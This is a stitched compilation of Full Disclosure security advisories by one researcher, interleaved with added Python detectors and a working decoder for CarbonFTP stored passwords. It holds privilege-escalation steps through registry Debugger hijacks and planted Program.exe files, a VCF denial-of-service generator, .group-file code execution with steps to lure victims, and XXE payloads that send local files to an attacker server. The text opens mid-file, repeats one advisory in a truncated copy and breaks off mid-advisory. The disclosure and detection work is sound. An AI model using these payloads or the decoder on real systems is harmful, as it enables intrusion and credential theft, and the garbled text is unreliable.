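FLAG_NAMES = ((FIN, "FIN"), (SYN, "SYN"), (RST, "RST"), (PSH, "PSH"),
              (ACK, "ACK"), (URG, "URG"), (ECE, "ECE"), (CWR, "CWR"))


def flag_names(flags):
    """Concatenate the names of the set bits in bit order, e.g. 41 -> 'FINPSHURG'.
    (The post writes ECE as 'ECN'; the bit is the same.)"""
    return "".join(name for bit, name in FLAG_NAMES if flags & bit) or "NONE"


def nmap_syn_variants():
    """All SYN-plus-extras combinations that still draw a SYN/ACK from an open
    port: the fifteen --scanflags values the post lists as bypasses."""
    extras = (PSH, URG, ECE, CWR)
    values = set()
    for n in range(1, len(extras) + 1):
        for combo in combinations(extras, n):
            values.add(SYN | sum(combo))
    return sorted(values)


def classify_flags(flags):
    """Map the flag byte of a segment that belongs to no existing connection to
    the Nmap scan type that produces it. Flags alone cannot separate -sS from
    -sT, or -sA from -sW, so those pairs are reported together."""
    flags &= 0xFF
    if flags == 0:
        return "NULL scan (-sN)"
    if flags == FIN:
        return "FIN scan (-sF)"
    if flags == FIN | PSH | URG:
        return "Xmas scan (-sX)"
    if flags == FIN | ACK:
        return "Maimon scan (-sM)"
    if flags == ACK:
        return "ACK scan (-sA) or Window scan (-sW)"
    if flags == SYN:
        return "SYN scan (-sS) or connect scan (-sT)"
    if flags & SYN and not flags & (ACK | RST):
        return "custom --scanflags SYN variant (%s)" % flag_names(flags)
    return "other (%s)" % flag_names(flags)


# Constructed sample of unsolicited inbound segments: (source, dst port, flags, window).
SAMPLE_PROBES = [
    ("192.0.2.10", 139, SYN, 1024),
    ("192.0.2.10", 135, SYN | PSH, 1024),
    ("192.0.2.10", 21, SYN | PSH | URG, 666),
    ("192.0.2.11", 445, 0, 1024),
    ("192.0.2.12", 80, SYN | ACK, 8192),
]


def detect(probes):
    """One alert line per segment whose flags match a scan type. The window is
    reported because the post calls 1024 typical of Nmap SYN scans, so an odd
    value such as 666 on an otherwise scan-shaped segment is itself a signal."""
    alerts = []
    for src, dport, flags, window in probes:
        label = classify_flags(flags)
        if label.startswith("other"):
            continue
        alerts.append("%s -> tcp/%d %s, window=%d" % (src, dport, label, window))
    return alerts


if __name__ == "__main__":
    for line in detect(SAMPLE_PROBES):
        print(line)
```

The SYN-variant branch is what closes the bypass the comments describe: any segment with SYN set and ACK and RST clear is treated as a connection attempt regardless of the extra bits, so PSH, URG, ECE and CWR no longer hide it.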
[FD] Recon-Informer v1 - Intel for offensive systems tool
Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive security systems, useful for penetration testers. It runs on Windows/Linux and leverages Scapy.

https://github.com/hyp3rlinx/0/blob/master/Recon-Informer.py

Thanks and stay safe to all,
hyp3rlinx
[FD] CVE-2019-18915 HP System Event Utility / Privilege Escalation Vulnerability
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HP-SYSTEM-EVENT-UTILITY-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.hp.com

[Product]
HP System Event Utility

The genuine HPMSGSVC.exe file is a software component of HP System Event Utility by HP Inc. HP System Event Utility enables the functioning of special function keys on select HP devices.

[Vulnerability Type]
Local Privilege Escalation

[CVE Reference]
CVE-2019-18915

[Security Issue]
The HP System Event service "HPMSGSVC.exe" will load an arbitrary EXE and execute it with SYSTEM integrity. HPMSGSVC.exe runs a background process that delivers push notifications.

The problem is that HP Message Service will load and execute any arbitrary executable named "Program.exe" if found in the user's c:\ drive.

Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe

Two Handles are inherited, properties are Write/Read
Name: \Device\ConDrv

This results in an arbitrary code execution persistence mechanism if an attacker can place an EXE in this location, and can be used to escalate privileges from Admin to SYSTEM.

HP has/is released/releasing a mitigation: https://support.hp.com/us-en/document/c06559359

[References]
PSR-2019-0204
https://support.hp.com/us-en/document/c06559359

[Network Access]
Local

[Disclosure Timeline]
Vendor Notification: October 7, 2019
HP PSRT "product team will address the issue in next release" : January 13, 2020
HP advisory and mitigation release : February 10, 2020
February 11, 2020 : Public Disclosure
[FD] [UPDATED - POC] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857
Updated: the exploit PoC had a check for an unused module I was testing, now removed; I had two versions but previously sent the wrong one.

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.neowise.com

[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and an option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8

[Vulnerability Type]
Insecure Proprietary Password Encryption

[CVE Reference]
CVE-2020-6857

[Affected Component]
Password Encryption

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary.

Passwords encoded as hex are converted to decimal, which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.
Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360 = a
27520 27617 27617 27617 27617 = b
27266 27616 27360 27361 27616 = aab
27521 27616 27616 27616 27616 = ba

Password encryption/decryption is as follows.

Encryption process example:

484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".

To decrypt we just perform the reverse of the operation above.

20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like:

"HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"

However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password.

Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10]  |
0047DA72 | 50             | push eax                       |
0047DA73 | B9 05 00 00 00 | mov ecx,5                      |
0047DA78 | 8B D3          | mov edx,ebx                    |
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678          |
0047DA82 | 83 C3 05       | add ebx,5                      |
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10]  | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C          |
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]   | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax       |
0047DA93 | 83 C6 02       | add esi,2                      |
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418          |
0047DA9E | 3B D8          | cmp ebx,ea
[FD] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.neowise.com

[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa. It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and an option to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8

[Vulnerability Type]
Insecure Proprietary Password Encryption

[CVE Reference]
CVE-2020-6857

[Affected Component]
Password Encryption

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key. The key for locally stored FTP server passwords is hard-coded in the binary.

Passwords encoded as hex are converted to decimal, which is then computed by adding the key "97F" to the result. The key 97F seems to be the same for all executables across all systems. Finally, passwords are stored as decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files. They can be found under "C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.
Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360 = a
27520 27617 27617 27617 27617 = b
27266 27616 27360 27361 27616 = aab
27521 27616 27616 27616 27616 = ba

Password encryption/decryption is as follows.

Encryption process example:

484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".

To decrypt we just perform the reverse of the operation above.

20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from the current password up until reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes. Therefore, we will get several cracked password candidates like:

"HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"

However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one shot without having several candidates to choose from with one of them being the correct password.

Therefore, "LONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947" and because it is greater than nine bytes it is cracked without any candidate passwords returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process. Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10]  |
0047DA72 | 50             | push eax                       |
0047DA73 | B9 05 00 00 00 | mov ecx,5                      |
0047DA78 | 8B D3          | mov edx,ebx                    |
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678          |
0047DA82 | 83 C3 05       | add ebx,5                      |
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10]  | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C          |
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]   | ;<=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax       |
0047DA93 | 83 C6 02       | add esi,2                      |
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]   | [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418          |
0047DA9E | 3B D8          | cmp ebx,eax                    |
0047DAA0 | 7E CD          | jle carbonftp.47DA6F           |

Ok, simple explanation after SetBPX in 47DA
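Added example, not from either CarbonFTP post: the storage scheme both advisories describe, implemented in Python so the worked numbers above can be checked. Decoding the advisory's own stored values shows that the first byte of the decoded buffer is always the password length (4 for "HELL", 2 for "XY", 1 for "a"), so the decoder returns the exact password directly. The encoder is reconstructed from the description and samples; its zero pad byte for odd byte counts is my assumption, as every sample on the page has an even count.

```python
KEY = 0x97F        # 2431, the constant the advisory finds subtracted at 0047DA8D
MIN_CHARS = 9      # shorter passwords are repeated out to nine characters before encoding
GROUP = 5          # each 16-bit word is written as a zero-padded five-digit decimal


def decode_cftp_password(stored):
    """Reverse the scheme: five-digit groups -> (word - KEY) -> little-endian bytes.

    The loop at 0047DA90 stores each result as a 16-bit word, so the bytes come
    out little-endian. In every value the advisory prints the first byte equals
    the password length, so the buffer is read as a length-prefixed string and
    the repeat padding drops out on its own; no candidate list is needed.
    """
    if not stored.isdigit() or len(stored) % GROUP:
        raise ValueError("expected a run of %d-digit decimal groups" % GROUP)
    words = [int(stored[i:i + GROUP]) - KEY for i in range(0, len(stored), GROUP)]
    if any(not 0 <= w <= 0xFFFF for w in words):
        raise ValueError("group out of range; not a CarbonFTP value")
    raw = b"".join(w.to_bytes(2, "little") for w in words)
    length = raw[0]
    return raw[1:1 + length].decode("latin-1")


def encode_cftp_password(password):
    """Forward direction, reconstructed from the advisory's description and samples."""
    if not 0 < len(password) < 256:
        raise ValueError("length must fit the single length byte")
    data = password.encode("latin-1")
    if len(data) < MIN_CHARS:
        data = (data * MIN_CHARS)[:MIN_CHARS]      # "HELL" -> "HELLHELLH"
    raw = bytes([len(password)]) + data
    if len(raw) % 2:
        # ASSUMPTION: zero pad for an odd byte count; every advisory sample is even.
        raw += b"\x00"
    return "".join("{:05d}".format(int.from_bytes(raw[i:i + 2], "little") + KEY)
                   for i in range(0, len(raw), 2))


# Stored values copied from the advisory, with the password it states for each.
ADVISORY_SAMPLES = {
    "2086721956209392195620939": "HELL",
    "2496125048250482504825048": "XY",
    "2726627616273602736127616": "aab",
    "2752127616276162761627616": "ba",
}

if __name__ == "__main__":
    for stored, stated in ADVISORY_SAMPLES.items():
        print("%s -> %r (advisory: %s)" % (stored, decode_cftp_password(stored), stated))
```

Since every step is a fixed offset and the 2431 is identical on every install, a stored .CFTP value is plaintext-equivalent: anyone who can read the project file can recover the FTP credential in one pass. The 45-digit value quoted above decodes the same way in one shot to a 17-character string whose leading length byte is 0x11, which is why no candidates appear for longer passwords.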
[FD] CVE-2019-19697 / Trend Micro Security 2019 (Consumer) / Security Bypass Protected Service Tampering
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
[+] ISR: ApparitionSec

[Vendor]
www.trendmicro.com

[Product]
Trend Micro Security 2019 (Consumer) Multiple Products

Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft.

[Vulnerability Type]
Security Bypass Protected Service Tampering

[CVE Reference]
CVE-2019-19697

[Security Issue]
Trend Micro Maximum Security is vulnerable to arbitrary code execution as it allows for creation of a registry key to target a process running as SYSTEM. This can allow malware to gain elevated privileges to take over and shut down services that require SYSTEM privileges, like Trend Micro's "Asmp" service "coreServiceShell.exe", which does not allow Administrators to tamper with them.

This could allow an attacker or malware to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them from starting. Note administrator privileges are required to exploit this vulnerability.

[CVSS 3.0 Scores: 3.9]

[Affected versions]
Platform Microsoft Windows
Premium Security 2019 (v15)
Maximum Security 2019 (v15)
Internet Security 2019 (v15)
Antivirus + Security 2019 (v15)

[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx

[Exploit/POC]
1) Create an entry for the following registry key targeting "PtWatchdog.exe" and set the debugger string value to an arbitrary executable to gain SYSTEM privs.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe

2) Create a string named "debugger" under the reg key and give it the value of the executable you wish to run as SYSTEM.

3) Restart the machine or wait until the service is restarted, then you get SYSTEM and can now disable the Trend Micro endpoint security coreServiceShell.exe service.

[Network Access]
Local

[Severity]
Low

[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor confirms issue: October 28, 2019
Vendor release date: January 14, 2020
January 16, 2020 : Public Disclosure
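Added example (not part of the advisory): detection for the registry persistence the PoC relies on. The Python below scans a .reg export for Image File Execution Options "Debugger" values, plus the related SilentProcessExit "MonitorProcess" values, and reports which image each one redirects. The .reg text is constructed; PtWatchdog.exe is the image named in the advisory, and the launched paths are placeholders.

```python
import re

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]\s*$')
VAL_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"\s*$')

# Key path fragment (lower-case) -> value names that make Windows launch a chosen
# binary in place of, or alongside, the named image. "Debugger" is the value the
# advisory's PoC sets; MonitorProcess lives under the sibling SilentProcessExit key.
WATCHED = {
    "\\image file execution options\\": {"debugger"},
    "\\silentprocessexit\\": {"monitorprocess"},
}

# Constructed .reg export: a benign GlobalFlag entry, a Debugger hijack like the
# PoC, and a SilentProcessExit monitor. Paths are placeholders.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe]
"Debugger"="C:\\Users\\Public\\unexpected.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sample.exe]
"MonitorProcess"="C:\\Temp\\monitor.exe"
'''


def unescape_reg_string(value):
    """Undo the escaping reg export applies to REG_SZ data."""
    return value.replace('\\"', '"').replace("\\\\", "\\")


def watched_names(key):
    """Value names to report for this key, or None if the key is not of interest."""
    lower = key.lower()
    for marker, names in WATCHED.items():
        if marker in lower:
            return names
    return None


def find_ifeo_hijacks(reg_text):
    """Return (image name, value name, launched path) for every Debugger or
    MonitorProcess value found under the watched keys of a .reg export."""
    findings = []
    current_key, names = None, None
    for line in reg_text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current_key = m.group("key")
            names = watched_names(current_key)
            continue
        if not names:
            continue
        m = VAL_RE.match(line)
        if m and m.group("name").lower() in names:
            image = current_key.rsplit("\\", 1)[-1]
            findings.append((image, m.group("name"), unescape_reg_string(m.group("value"))))
    return findings


if __name__ == "__main__":
    for image, name, path in find_ifeo_hijacks(SAMPLE_REG):
        print("%s on %s launches %s" % (name, image, path))
```

Any Debugger value on a security product's own images is a finding in itself; since the PoC needs administrator rights to write the key, the control that matters is visibility, e.g. alerting on value writes beneath the Image File Execution Options key and diffing exports of it over time.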
[FD] CVE-2019-20357 / Trend Micro Security (Consumer) / Persistent Arbitrary Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-PERSISTENT-ARBITRARY-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.trendmicro.com

[Product(s)]
Trend Micro Security (Consumer) Multiple Products

Trend Micro Security provides comprehensive protection for your devices. This includes protection against ransomware, viruses, malware, spyware, and identity theft.

[Vulnerability Type]
Persistent Arbitrary Code Execution

[CVE Reference]
CVE-2019-20357

[CVSSv3 Scores: 6.7]

[Security Issue]
Trend Micro Security can potentially allow attackers to use a malicious program to escalate privileges to SYSTEM integrity and attain persistence on a vulnerable system.

[Product Affected Versions]
Platform Microsoft Windows
Premium Security 2019 (v15) and 2020 (v16)
Maximum Security 2019 (v15) and 2020 (v16)
Internet Security 2019 (v15) and 2020 (v16)
Antivirus + Security 2019 (v15) and 2020 (v16)

[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124099.aspx

[Exploit/POC]
Compile C test code "Program.c"

#include <stdio.h>
#include <stdlib.h>

void main(void){
    puts("Done!");
    system("pause");
}

1) Place under c:\ dir.
2) Reboot the machine, the coreServiceShell.exe service loads and executes our binary with SYSTEM integrity.

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: October 8, 2019
vendor advisory: January 15, 2020
January 16, 2020 : Public Disclosure
[FD] Microsoft Windows VCF Card / Mailto Link Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI).

[Vulnerability Type]
Mailto Link Denial Of Service

[CVE Reference]
N/A

[Security Issue]
Windows VCF cards do not properly sanitize email addresses, allowing for HTML injection. A corrupt VCF card can cause all of the user's currently open files and applications to be closed and their session to be terminated, without requiring any accompanying attacker-supplied code. This can be done by crafting the mailto link to point to the Windows "logoff.exe". The corrupt VCF card can then kill all of the user's applications and also log the target off their computer, if the VCF card is opened using Windows Contacts and the link is clicked.

The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args.

This will probably affect Windows 7 the most, as Windows 10 can default to opening VCF files in other programs like (People). However, users can possibly still choose to open the VCF in Contacts by right-clicking the file.

Note: this exploit requires user interaction.

[Exploit/POC]
"VCF_DoS.py"

dirty_vcf = (
    'BEGIN:VCARD\n'
    'VERSION:4.0\n'
    'FN:Session Terminate PoC - ApparitionSec\n'
    'EMAIL:d...@microsoft.com\n'
    'END:VCARD')

with open("DoS.vcf", "w") as f:
    f.write(dirty_vcf)

print("VCF Denial Of Service card created!")
print("By hyp3rlinx")

[POC Video URL]
https://www.youtube.com/watch?v=P4OGN7pZLSg

[Network Access]
Local

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: January 2, 2020
MSRC: "In order to investigate your report I will need an explanation on how an attacker could use the information to exploit another user remotely without the use of social engineering... As such, this thread is being closed" : January 3, 2020
January 4, 2020 : Public Disclosure
[FD] Microsoft Windows .Group File / URL Field Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] apparitionsec@gmail
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Windows ".Group" File Type

Group files are a collection of contacts created by Windows Contacts, an embedded contact management program included with Windows. A group file contains a list of contacts saved into a group, which can be used to create a mailing list for sending email messages to multiple addresses at once.

[Vulnerability Type]
URL Field Code Execution

[CVE Reference]
N/A

[Security Issue]
Windows ".group" files are related to Contact files and suffer from unexpected code execution when clicking the "Contact Group Details" tab Website Go button. This happens if the website URL field points to an executable file. This is the same type of vulnerability affecting Windows .contact files, which remains unfixed as of the time of this writing and has a Metasploit module available.

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Therefore, attacker-supplied executables can run unexpectedly, while the user thinks they are visiting a website when clicking the Website Go button. Moreover, if files are compressed using certain archive utilities it may be possible to skirt security warnings even when the executable is internet downloaded or copied from a network share.

This exploit requires a bit more user interaction than the previously disclosed .contact file vulnerability, as the GROUP file will complain if not in the Contacts directory. Advisory released for the sake of completeness and user security awareness.
[Exploit/POC]
1) Create a Windows .group file.
2) Create a directory named "http".
3) Create an executable file with a .com extension (change .exe to .com), e.g. www.microsoft.com, and place it in the "http" dir alongside the .group file.
4) Point the website URL to the executable using path traversal like "http.\ www.microsoft.com", which is the website address in the .group file.
   Note: the directory traversal can also point to other dirs like ..\Downloads\http.\microsoft.com, but the downside is that the URL looks very sketchy.
5) Package it up in an archive (.rar etc).
6) Send the .group file via email, or download it and lure the user to place the archive in the "c:\User\\Contacts" directory.
7) Open the archive and double click the .group file (Windows will complain with an error to move to the contacts folder if not within that dir already), then click the website address Go button.

The attacker's executable will run instead of navigating to a website, as would be expected by an end user.

[Severity]
High

[Disclosure Timeline]
Vendor Notification: Same type of vuln affecting .contact files disclosed January 16, 2019, status remains unfixed.
January 1, 2020 : Public Disclosure
[FD] Microsoft Windows Media Center / XXE MotW Bypass (Anniversary Edition)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security

[Vendor]
www.microsoft.com

[Product]
Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media player created by Microsoft. Media Center was first introduced to Windows in 2002 on Windows XP Media Center.

[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)

[CVE Reference]
N/A

[Security Issue]
This vulnerability was originally released by me back on December 4, 2016, yet remains unfixed. Now, to make matters worse, I will let you know that "mark-of-the-web" (MotW) does not matter here; it's just ignored. Meaning, if the .MCL file is internet downloaded it gets the MotW, but files are still exfiltrated. Therefore, I am releasing this "anniversary edition" XXE with important MotW information.

This is a fully working remote information disclosure vulnerability that still affects Windows 7. Windows 7 is near end of life this January, yet it is still used by many organizations. Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media Center, but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web-root of the attacker server (port 80 etc). Download the ".mcl" file using Microsoft Internet Explorer. Check the MotW in the dir where you downloaded the .mcl file ("dir /r") and note that the Zone.Identifier:$DATA stream exists. Open the file and BOOM! watch shitz leaving!... still vulnerable after all these years lol.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro

[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC
/FindMeThatBiotch.dtd"> %junk; %param666; %FindMeThatBiotch; ]>

2) "FindMeThatBiotch.dtd"

/%data666;'>">

3) Auto exploit PHP .mcl file downloader.

/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($url) . "\"");
readfile($url);
?>

4) python -m SimpleHTTPServer 80

[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: December 4, 2016
MSRC: "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure
[FD] Microsoft Visual Studio 2008 Express IDE / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279

[Vulnerability Type]
XML External Entity Injection 0Day

[CVE Reference]
N/A

[Security Issue]
Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. By opening any one of the file types listed below, it can allow remote attackers to steal files from the victim's computer, sending them to the remote attacker's server. Double click any of the following extensions and it will trigger the XXE vulnerability.

Note, upon installation of the IDE the following file types get associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.

[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml

This IDE is pretty old, I know, but it's still available for download as of this writing, therefore I release the advisory.

[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/

[Exploit/POC]
"Evil.snippet" (or any of the extensions mentioned above)

http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send;

"payload.dtd"

http://127.0.0.1:8000?%file;'>"> %all;

python -m SimpleHTTPServer
python -m http.server (Python3)

[POC Video URL]
https://www.youtube.com/watch?v=QOZlwzsbPrk

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: 3/24/2017
MSRC sent me a link to "Definition of a Security Vulnerability". Also, the product is no longer supported.
December 1, 2019 : Public Disclosure
[FD] Microsoft Excel 2016 v1901 / Import Error XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications.

[CVE]
N/A

[Vulnerability Type]
Error Import Based XML External Entity Injection

[Security Issue]
